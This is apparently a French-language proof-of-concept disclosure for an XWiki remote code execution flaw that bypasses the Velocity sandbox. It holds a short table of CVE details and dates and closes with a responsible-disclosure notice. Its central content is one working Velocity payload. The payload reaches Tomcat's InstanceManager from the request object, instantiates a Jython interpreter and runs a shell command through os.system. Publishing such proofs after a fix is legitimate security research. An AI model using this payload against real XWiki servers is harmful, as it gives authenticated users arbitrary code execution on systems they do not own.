
Preuve de concept d'exploitation pour CVE-2026-33229, une RCE XWiki via contournement du sandbox Apache Velocity, avec détails techniques et payload fonctionnel.
Une vulnérabilité d'exécution de code à distance dans XWiki Platform qui permet à un utilisateur authentifié disposant des permissions de script de contourner entièrement le sandbox Apache Velocity — sans nécessiter de réflexion Java — en parcourant des objets pré-instanciés déjà présents dans le contexte Velocity.
📄 Détails techniques complets : youssefazefzaf.com/posts/cve
| Champ | Valeur |
|---|
| ID CVE | CVE-2026-33229 |
| Produit concerné | XWiki Platform |
| Composant | Rendu de macro Velocity, paramètre de titre de page |
| Privilèges requis | Authentifié + permission Script |
| Impact | Exécution de code à distance |
| GHSA | GHSA-h259-74h5-4rh9 |
| Découverte | 7 novembre 2025 |
| Correctif | 10 décembre 2025 |
| Divulgation | 8 avril 2026 |
$request.request.getServletContext().getAttribute("org.apache.tomcat.InstanceManager").newInstance("org.apache.batik.script.jpython.JPythonInterpreter").evaluate("import os; os.system('touch /tmp/RCE')")
Avis de divulgation responsable : PoC publié après la disponibilité du correctif. Ne pas utiliser contre des systèmes dont vous n'êtes pas propriétaire.